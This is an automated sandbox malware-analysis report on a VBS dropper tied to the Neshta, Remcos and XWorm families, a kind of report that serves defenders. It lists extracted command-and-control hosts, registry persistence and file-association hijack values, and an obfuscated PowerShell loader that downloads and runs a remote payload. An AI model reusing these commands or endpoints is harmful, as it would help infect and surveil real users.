neshta | 1272222474d0a004d1d74e17acd3c30105a92a13fe1e50168ea0c68f460f268e

Analysis

max time kernel
299s
max time network
301s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
22-05-2024 17:38

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

temp.vbs
Size

71KB
MD5

eb3f3f1471a124dbe6072f3ef42509d3
SHA1

2992f70f82729ec0e3f09165fa566544a80c9e12
SHA256

1272222474d0a004d1d74e17acd3c30105a92a13fe1e50168ea0c68f460f268e
SHA512

405f022877711eb5ee2c4969e797388bd471662dc5832ab761d498d5c3994f4048190226d5a04101dd95c9a2f256d098a7aaafbbf78331fbf2f321645dbaa2fd
SSDEEP

1536:91gXvG0t/qdzisXIelHdhar/kV+rihMY/HDzs7qfvlEiHGDB:9uPYZisYelnars++7PDYq3LGDB

Score

10^/10

neshta remcos xworm remotehost persistence rat spyware trojan

Malware Config

Extracted

Family

xworm

Version

3.1

xw9402may.duckdns.org:9402

xwormay9090.duckdns.org:9090

Mutex

5w6Cp63r66k4Jxsj

Attributes

install_file
USB.exe

aes.plain

Extracted

Family

remcos

Botnet

RemoteHost

reco8100may.duckdns.org:8100

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-KZIWQS
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Detect Xworm Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/428-47-0x0000000000ED0000-0x0000000000EDE000-memory.dmp	family_xworm
behavioral2/memory/1576-147-0x0000000000BD0000-0x0000000000BDE000-memory.dmp	family_xworm

Neshta
Malware from the neshta family is designed to infect itself into other files to spread itself and cause damage.
persistence spyware neshta
Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Blocklisted process makes network request 6 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

flow pid process

14 2696 powershell.exe
55 2528 powershell.exe
64 4576 powershell.exe
80 4556 powershell.exe
101 6624 powershell.exe
102 6532 powershell.exe

flow	pid	process
14	2696	powershell.exe
55	2528	powershell.exe
64	4576	powershell.exe
80	4556	powershell.exe
101	6624	powershell.exe
102	6532	powershell.exe

Checks computer location settings 2 TTPs 7 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

WScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\Control Panel\International\Geo\Nation	WScript.exe

Modifies system executable filetype association 2 TTPs 1 IoCs
persistence

Modify Registry
T1112

Change Default File Association
T1546.001

Processes:

wab.exe

description ioc process

Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" wab.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	wab.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Startup key = "%Forringens% -w 1 $kettledrummer=(Get-ItemProperty -Path 'HKCU:\\Unsliding\\').Warmnesses;%Forringens% ($kettledrummer)"	reg.exe

Suspicious use of NtCreateThreadExHideFromDebugger 5 IoCs

Processes:

wab.exewab.exewab.exewab.exewab.exe

pid process

428 wab.exe
1576 wab.exe
4136 wab.exe
3284 wab.exe
4392 wab.exe

pid	process
428	wab.exe
1576	wab.exe
4136	wab.exe
3284	wab.exe
4392	wab.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs

Processes:

powershell.exewab.exepowershell.exewab.exepowershell.exepowershell.exewab.exewab.exepowershell.exewab.exepowershell.exepowershell.exewab.exewab.exe

pid	process
1576	powershell.exe
428	wab.exe
3892	powershell.exe
1576	wab.exe
2360	powershell.exe
676	powershell.exe
3284	wab.exe
4136	wab.exe
7108	powershell.exe
5904	wab.exe
6472	powershell.exe
3308	powershell.exe
6784	wab.exe
4392	wab.exe

Suspicious use of SetThreadContext 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process	target process
PID 1576 set thread context of 428	1576	powershell.exe	wab.exe
PID 3892 set thread context of 1576	3892	powershell.exe	wab.exe
PID 2360 set thread context of 3284	2360	powershell.exe	wab.exe
PID 676 set thread context of 4136	676	powershell.exe	wab.exe
PID 7108 set thread context of 5904	7108	powershell.exe	wab.exe
PID 6472 set thread context of 6784	6472	powershell.exe	wab.exe
PID 3308 set thread context of 4392	3308	powershell.exe	wab.exe

Drops file in Program Files directory 64 IoCs

Processes:

wab.exe

description	ioc	process
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\READER~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\msedge.exe	wab.exe
File opened for modification	C:\PROGRA~2\WINDOW~3\ACCESS~1\wordpad.exe	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADOBEC~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Java\JAVAUP~1\jucheck.exe	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\java.exe	wab.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ExtExport.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\COOKIE~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\ELEVAT~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\MSEDGE~3.EXE	wab.exe
File opened for modification	C:\PROGRA~2\WINDOW~2\wabmig.exe	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\VSTO\10.0\VSTOIN~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\INTERN~1\iexplore.exe	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroCEF\RdrCEF.exe	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\NOTIFI~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MICROS~2.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MIA062~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\MicrosoftEdgeUpdate.exe	wab.exe
File opened for modification	C:\PROGRA~3\Adobe\Setup\{AC76B~1\setup.exe	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{EF6B0~1\VCREDI~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\AcroRd32.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\BHO\IE_TO_~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MICROS~4.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MICROS~3.EXE	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{EF5AF~1\WINDOW~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\Eula.exe	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOF5E2~1.EXE	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{D87AE~1\WINDOW~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\LOGTRA~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\AdobeARM.exe	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\DISABL~1.EXE	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROBR~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\64BITM~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ielowutil.exe	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\920902~1.67\PWAHEL~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MI391D~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmlaunch.exe	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaw.exe	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\Edge\APPLIC~1\MSEDGE~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\13187~1.37\MICROS~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\MICROS~1\EDGEUP~1\Download\{F3C4F~1\13187~1.37\MICROS~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmprph.exe	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\WOW_HE~1.EXE	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE	wab.exe
File opened for modification	C:\PROGRA~3\PACKAG~1\{61087~1\VCREDI~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Oracle\Java\javapath\javaws.exe	wab.exe
File opened for modification	C:\PROGRA~2\INTERN~1\ieinstal.exe	wab.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\setup_wm.exe	wab.exe
File opened for modification	C:\PROGRA~2\WINDOW~4\wmplayer.exe	wab.exe
File opened for modification	C:\PROGRA~3\MICROS~1\CLICKT~1\{9AC08~1\INTEGR~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\ADelRCP.exe	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\arh.exe	wab.exe
File opened for modification	C:\PROGRA~2\Adobe\ACROBA~1\Reader\plug_ins\PI_BRO~1\32BITM~1.EXE	wab.exe
File opened for modification	C:\PROGRA~2\COMMON~1\Adobe\ARM\1.0\ADOBEA~1.EXE	wab.exe

Drops file in Windows directory 1 IoCs

Processes:

wab.exe

description ioc process

File opened for modification C:\Windows\svchost.com wab.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 2 IoCs

Processes:

WerFault.exeWerFault.exe

pid pid_target process target process

6904 5904 WerFault.exe wab.exe
5640 6784 WerFault.exe wab.exe

description	ioc	process
File opened for modification	C:\Windows\svchost.com	wab.exe

pid	pid_target	process	target process
6904	5904	WerFault.exe	wab.exe
5640	6784	WerFault.exe	wab.exe

Modifies registry class 3 IoCs

Processes:

wab.exewab.exewab.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings	wab.exe
Key created	\REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000_Classes\Local Settings	wab.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*"	wab.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

3312 reg.exe

pid	process
3312	reg.exe

Suspicious behavior: EnumeratesProcesses 43 IoCs

Processes:

powershell.exepowershell.exewab.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewab.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2696	powershell.exe
2696	powershell.exe
1576	powershell.exe
1576	powershell.exe
1576	powershell.exe
428	wab.exe
2528	powershell.exe
2528	powershell.exe
4576	powershell.exe
4576	powershell.exe
3892	powershell.exe
3892	powershell.exe
2360	powershell.exe
2360	powershell.exe
3892	powershell.exe
3892	powershell.exe
2360	powershell.exe
4556	powershell.exe
4556	powershell.exe
4556	powershell.exe
2360	powershell.exe
676	powershell.exe
676	powershell.exe
676	powershell.exe
676	powershell.exe
1576	wab.exe
1576	wab.exe
6624	powershell.exe
6624	powershell.exe
7108	powershell.exe
7108	powershell.exe
6532	powershell.exe
6532	powershell.exe
7108	powershell.exe
7108	powershell.exe
3308	powershell.exe
3308	powershell.exe
3308	powershell.exe
3308	powershell.exe
6472	powershell.exe
6472	powershell.exe
6472	powershell.exe
6472	powershell.exe

Suspicious behavior: MapViewOfSection 7 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid process

1576 powershell.exe
3892 powershell.exe
2360 powershell.exe
676 powershell.exe
7108 powershell.exe
3308 powershell.exe
6472 powershell.exe

Suspicious use of AdjustPrivilegeToken 16 IoCs

Processes:

powershell.exepowershell.exewab.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exewab.exewab.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	2696	powershell.exe
Token: SeDebugPrivilege	1576	powershell.exe
Token: SeDebugPrivilege	428	wab.exe
Token: SeDebugPrivilege	2528	powershell.exe
Token: SeDebugPrivilege	4576	powershell.exe
Token: SeDebugPrivilege	3892	powershell.exe
Token: SeDebugPrivilege	2360	powershell.exe
Token: SeDebugPrivilege	4556	powershell.exe
Token: SeDebugPrivilege	676	powershell.exe
Token: SeDebugPrivilege	1576	wab.exe
Token: SeDebugPrivilege	3284	wab.exe
Token: SeDebugPrivilege	6624	powershell.exe
Token: SeDebugPrivilege	7108	powershell.exe
Token: SeDebugPrivilege	6532	powershell.exe
Token: SeDebugPrivilege	3308	powershell.exe
Token: SeDebugPrivilege	6472	powershell.exe

Suspicious use of SetWindowsHookEx 3 IoCs

Processes:

wab.exewab.exewab.exe

pid process

428 wab.exe
1576 wab.exe
4136 wab.exe

pid	process
428	wab.exe
1576	wab.exe
4136	wab.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

WScript.exepowershell.exepowershell.exewab.execmd.exeWScript.exepowershell.exeWScript.exepowershell.exepowershell.exepowershell.exeWScript.exepowershell.exe

description	pid	process	target process
PID 3880 wrote to memory of 2696	3880	WScript.exe	powershell.exe
PID 3880 wrote to memory of 2696	3880	WScript.exe	powershell.exe
PID 2696 wrote to memory of 4148	2696	powershell.exe	cmd.exe
PID 2696 wrote to memory of 4148	2696	powershell.exe	cmd.exe
PID 2696 wrote to memory of 1576	2696	powershell.exe	powershell.exe
PID 2696 wrote to memory of 1576	2696	powershell.exe	powershell.exe
PID 2696 wrote to memory of 1576	2696	powershell.exe	powershell.exe
PID 1576 wrote to memory of 4080	1576	powershell.exe	cmd.exe
PID 1576 wrote to memory of 4080	1576	powershell.exe	cmd.exe
PID 1576 wrote to memory of 4080	1576	powershell.exe	cmd.exe
PID 1576 wrote to memory of 428	1576	powershell.exe	wab.exe
PID 1576 wrote to memory of 428	1576	powershell.exe	wab.exe
PID 1576 wrote to memory of 428	1576	powershell.exe	wab.exe
PID 1576 wrote to memory of 428	1576	powershell.exe	wab.exe
PID 1576 wrote to memory of 428	1576	powershell.exe	wab.exe
PID 428 wrote to memory of 5028	428	wab.exe	cmd.exe
PID 428 wrote to memory of 5028	428	wab.exe	cmd.exe
PID 428 wrote to memory of 5028	428	wab.exe	cmd.exe
PID 5028 wrote to memory of 3312	5028	cmd.exe	reg.exe
PID 5028 wrote to memory of 3312	5028	cmd.exe	reg.exe
PID 5028 wrote to memory of 3312	5028	cmd.exe	reg.exe
PID 428 wrote to memory of 3324	428	wab.exe	WScript.exe
PID 428 wrote to memory of 3324	428	wab.exe	WScript.exe
PID 428 wrote to memory of 3324	428	wab.exe	WScript.exe
PID 3324 wrote to memory of 2528	3324	WScript.exe	powershell.exe
PID 3324 wrote to memory of 2528	3324	WScript.exe	powershell.exe
PID 3324 wrote to memory of 2528	3324	WScript.exe	powershell.exe
PID 2528 wrote to memory of 2932	2528	powershell.exe	cmd.exe
PID 2528 wrote to memory of 2932	2528	powershell.exe	cmd.exe
PID 2528 wrote to memory of 2932	2528	powershell.exe	cmd.exe
PID 428 wrote to memory of 220	428	wab.exe	WScript.exe
PID 428 wrote to memory of 220	428	wab.exe	WScript.exe
PID 428 wrote to memory of 220	428	wab.exe	WScript.exe
PID 220 wrote to memory of 4576	220	WScript.exe	powershell.exe
PID 220 wrote to memory of 4576	220	WScript.exe	powershell.exe
PID 220 wrote to memory of 4576	220	WScript.exe	powershell.exe
PID 4576 wrote to memory of 2124	4576	powershell.exe	cmd.exe
PID 4576 wrote to memory of 2124	4576	powershell.exe	cmd.exe
PID 4576 wrote to memory of 2124	4576	powershell.exe	cmd.exe
PID 428 wrote to memory of 4092	428	wab.exe	WScript.exe
PID 428 wrote to memory of 4092	428	wab.exe	WScript.exe
PID 428 wrote to memory of 4092	428	wab.exe	WScript.exe
PID 2528 wrote to memory of 3892	2528	powershell.exe	powershell.exe
PID 2528 wrote to memory of 3892	2528	powershell.exe	powershell.exe
PID 2528 wrote to memory of 3892	2528	powershell.exe	powershell.exe
PID 3892 wrote to memory of 3276	3892	powershell.exe	cmd.exe
PID 3892 wrote to memory of 3276	3892	powershell.exe	cmd.exe
PID 3892 wrote to memory of 3276	3892	powershell.exe	cmd.exe
PID 4576 wrote to memory of 2360	4576	powershell.exe	powershell.exe
PID 4576 wrote to memory of 2360	4576	powershell.exe	powershell.exe
PID 4576 wrote to memory of 2360	4576	powershell.exe	powershell.exe
PID 2360 wrote to memory of 4616	2360	powershell.exe	cmd.exe
PID 2360 wrote to memory of 4616	2360	powershell.exe	cmd.exe
PID 2360 wrote to memory of 4616	2360	powershell.exe	cmd.exe
PID 4092 wrote to memory of 4556	4092	WScript.exe	powershell.exe
PID 4092 wrote to memory of 4556	4092	WScript.exe	powershell.exe
PID 4092 wrote to memory of 4556	4092	WScript.exe	powershell.exe
PID 4556 wrote to memory of 4340	4556	powershell.exe	cmd.exe
PID 4556 wrote to memory of 4340	4556	powershell.exe	cmd.exe
PID 4556 wrote to memory of 4340	4556	powershell.exe	cmd.exe
PID 3892 wrote to memory of 1576	3892	powershell.exe	wab.exe
PID 3892 wrote to memory of 1576	3892	powershell.exe	wab.exe
PID 3892 wrote to memory of 1576	3892	powershell.exe	wab.exe
PID 3892 wrote to memory of 1576	3892	powershell.exe	wab.exe

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\temp.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Autarkically189 = 1;$Indgangssignaletnstruktionsbger='Sub';$Indgangssignaletnstruktionsbger+='strin';$Indgangssignaletnstruktionsbger+='g';Function Quadmeter($Dopingsigtet){$Dumpeprocenter=$Dopingsigtet.Length-$Autarkically189;For($Indgangssignalet=5;$Indgangssignalet -lt $Dumpeprocenter;$Indgangssignalet+=6){$Forlys+=$Dopingsigtet.$Indgangssignaletnstruktionsbger.Invoke( $Indgangssignalet, $Autarkically189);}$Forlys;}function Flaprer($Caissoned){& ($Sopites) ($Caissoned);}$Generalisternes=Quadmeter 'PylorM edto ,ildzI raeiMa oel Uerhl Falsahejka/Timia5 L ft.Gar,e0Andro K,rre(M.ckeW,evaaiSvinenAnti.dLandgo FluewSkalksgarnn OraclNJaponTYoudi Gr,ni1Codd 0Unde,.S ick0Tilkr;Event BistW joiniContrn .chw6 Hrin4S,vsu;Hapte Seg exRende6Gaine4Prebl;J.mps Pu prBoligv Fort: Edu.1 Hete2 cure1Vomme.Mona.0A.pel)Omber Vra.tG Trafe Her.cG,laxkMonisoHensl/Unsea2Foeta0Dekup1Wares0 udpl0Redes1Bepow0Muted1slapp .raktFPlaitiFuskerKentoe Ba,rf Tra,oUtrovxvedes/ Anda1Utilf2 Damp1 Trid.Bus,i0Ilixa ';$Lifeblood=Quadmeter 'FolkeUCroo s merceBestyrSulmu-KlimaAGul bgAnecdeSlut,nProtot luma ';$Postfrontal=Quadmeter 'Ca dihVaabetD llat.unktpSf.rbs Ndve:Hjlan/Broo / rickrCatkiacors,nOverlcT,enehPatruoT,ldebSupero Pol.sFrembcDickeaLecitr Sv.ndLatheiStyktnFilmo.Sweepcshaveo S pemCapit.PollybKulbrrSvend/Me.alcSk,ttsNasc /Hupa.RUnex rEnangk refonTas eo Jugeg HanelEva,geIgnitrP ntenF,rdreForst.A gotaKinetsAkkordBrug, ';$Uninnocuous=Quadmeter 'Kundg>Provi ';$Sopites=Quadmeter ',ablei RealePrespxTe,ef ';$Sorteringsmulighederne='Exclusion';$Opkaldsprisen = Quadmeter 'Se.areNoteacoprejhJovasoLeann Bem r%BiofeaD strp Stutp KviedDin oa Kurit Unscaman,e% Kono\OluffATraf k AareeUndernIsopyb ,kikocererlUnderdTindi.MissiuS,ilnd ,nntf Enta pos r&Plasm& Proc M,rateO erpcProtohUnmeeod zzi Hres.tHavmi ';Flaprer (Quadmeter ' Blus$Urgeng GerulFryseo Lempb FrdiaLs lulAn gg:Sta,sMBras,aScombrDoedsi JuleaYndlin acroe Udso=Drukk(Kolp,cWap,emTomatdTr.ll Unris/Ch ckc Exto Visib$Un erOmag,rpLinjekEntraaOverfl ,hardFulnes rtepCodesrRe rniBeloesTerraeXylopnBr.es)Sikke ');Flaprer (Quadmeter 'Beund$Ophiug BaptlFissio O dlbUdfaka.ordblWangl: EmbiSVetkotStnkso.rimeoPellenmediz= Rver$ MetoPProteo Parks EmantIoannfunsierC.nfioRo ernSkotjtBistiaKlimalOrico. Bisis nhidp Opbel frigi StiltScamb( tale$InsecUAlternKnapbiUltran urunnRefrao e accRd.hau InaloGoo,euSagitsArbut)Sickl ');$Postfrontal=$Stoon[0];$prespakket= (Quadmeter 'Blegs$ WoengBicyclNarkooNon.ubVagotaFald.lsingu:V.jrsH G gguMillicUnmedkExtrisArtictEcchae Bul.r Prece predrOuthu=LoneyNTo.sieOrthowPerfe-PigeoOAndalbSu.jejDrasteFrigrcOracutFntrr Bss.SProctyDeckhsWhimbtCetaneEmbramLe,be.AcapnNKubeueBr kvtPost . GeneWNondeeSu,nobHelheC H melplaniiKrisee Xylon rist');$prespakket+=$Mariane[1];Flaprer ($prespakket);Flaprer (Quadmeter ' vato$ ShelHPierlu emmecDuks kKbsprs G ostRaf ie ,erirSan.eeMe osrPtose. SlatH StriehundraForgadSpe.keTubulr SknhsSkift[Os.eo$KonceLForbliMi.spf DieseKod.obLder.l ListoUnderoGare.dVou h]Pupil=Indyn$ CedeGRareteAnticn robeKod fr MaunaNonful Wonki.getisMediotPrincepsychrFors.nWebbeeoctansBgetr ');$Sedimentology=Quadmeter 'Forsg$CholoHFollouMo.incMichakCrudss bucctJevgeePs,udrUnde eSveskrP.ese.OyezeDProtaoCo bowDisfanHjernlFremfoBeskmaorgand BuslFsprayihelbrlVentreSkamf(Natur$enk sPOssifoSydkos Nonst FrihfJusterTakvioE,iksn RichtFolkeafilmil Un m,ele.t$SchweSMismoeKemikn.ftrasDiagniSub to TailnZa cl)Repro ';$Sension=$Mariane[0];Flaprer (Quadmeter 'F sty$cantlg ulteliv rao NonpbPr.reavandslE imi: .easI O,ygbBronzoSkee.eBleganMorfid BaadeHaptosHtte.=Hippo(taljeT arteFaldlsG bbetGl.sp-GgetsPVildta Gri,tStoddhoutpu udfol$ KodeS H,nseIngvenRundtsho.nwiAllowoB ogrnG,atb)Outsi ');while (!$Iboendes) {Flaprer (Quadmeter 'Diale$ ,notgSimull Bjero lagebS,iklaMacrolMiste:Fryt rtorpeeTalefw L llaEmbrokMycetiF.rlanKh ttgOuttr= Efte$,elgetarti,rSandiuCirc eFlabe ') ;Flaprer $Sedimentology;Flaprer (Quadmeter 'I.bjeSluthetBejaeaGleb,rHou et Gest- Nav SVinealAni.oeBriefeTroldpF.jia Rollo4Viru, ');Flaprer (Quadmeter 'Tryll$ infigTrafilTftinoAmpulb LudlaCheatlConso:BrndeI In ubThatconatioeConfin GalidFinene TerrsSkabs=Indle(SumplTPolite BeausClitutAnato- eakPHalluaFlammtS,linhUneli Pipet$ ConiSI dolePuppenSa,icscynomiFatt oPensinTande)Charl ') ;Flaprer (Quadmeter ' Nond$StilegSuccelUp taoKraftbImmeaaKontrlAf ci:Su,taNNul.teUnderw,krivsModstp MetaaKont,pTn,haeBegrbrAmalgw Sty,o uncomTrisoaTractnFiske=Sabao$ SivegProtalFrancoEsp,rbSuppeaKaliblYderv:Dok,eBopskrip,wdol PolslSonateFodredHdersgLseh.aKar,olSh,inlFileteBef lrKiliaiEn.ase He.srSu,penSt afe.esvr+ nfo+U,kke%Bordi$ MistS AfhatBogs,oHe taoBrnefn sams.Snipeclo,aloU deruartisnMonert Ste, ') ;$Postfrontal=$Stoon[$Newspaperwoman];}$Bortfaldets=331483;$Poultice=30104;Flaprer (Quadmeter 'Skra,$Jo,dfgSko,al,ovino P,ptbskaana heatlAll.n:UdbetTublufr.fspioBajadvfips,a UnretMinisoFiltrr SarieAntip Shri = skbn BietGTr gaeCo,sutVitam-TelocC S psoNephrn Dil.t FakueRaadynK oketBric Disso$ arinSAmazee ircn ,ndesKu,suiLatk,o f,ldnSnder ');Flaprer (Quadmeter 'De,ar$MetapgAlloclBethooInadvbHillbaTwic,lFilip:PrismHMedgaablegvzBitmaaI.idar.nebodGuttoiSvanesPeutieParoqspot.t Afnat=Pl ty Feti[,amilSNanosyAriids NonetSma.semucovmDisda. BeviCRetteo skr ncentrv unadeRenslrImplat Radi]Aarli:fdeva: AchrF.eogrrAt mioUdspemBygniBFusenaSigtesDybh.eStave6A,nes4AuspiS TjentOmvejrTernii Lin.nSkrubgeuryc(Kneb $KnaplTKra arS,xmio BestvParacaNumistIngefo nonirCent,eSisle) Homo ');Flaprer (Quadmeter 'Hoved$plukngE.ikelbrawnoAtlanb Ud.ia Trk.lLilia: ,oelSBi,alasim ldF,bridko.mue SkomlNetvrmstodgaBu lsgSchzjeFolkerG dssa KinnrGripybGag reSadisj DolldBesteeRkenlsStaff Foder=Airti super[StoltSSt.dgy CapesPostutHovedeAvogamDemag.Klun,TMononePaymax apentmaras. HedeEBrndsnNeurocVo,alo onomdEvighiFod onResolgWhitl]No.pr:batik:JechoAdetalSVirkeC Sub,IFrienISnadr. VigtG MesoeFili.tOtopaSFedtit.obberSalzfiRewaknG,nopgAlarm(L,ane$PopulHDrmmeaCentrzAfd laPhenor JuandEl rii Flaksbyta eMakkes .sdi)Numme ');Flaprer (Quadmeter 'hem.a$ModergApplalMozaroMisfibEg.nvaFertilOver :Vagtls undeoTet.acDi,ori Hyp aIn,uslb,irui UncosSymmevUr nem Hjlpr.naud= Unva$UnturSSpr.naBeskudYestod FebreFotoelOutram SelvaUnpasgHoldfeKantar BornaAdiporFusepbAnidreGanerjSkilldEjerteEntossUncov.WarslsTilveuKastabBurresStewatU,gagrOrcaniLicounEpexegHybe (Circu$SonniB SammoNonenr BohetProb.f Tilda 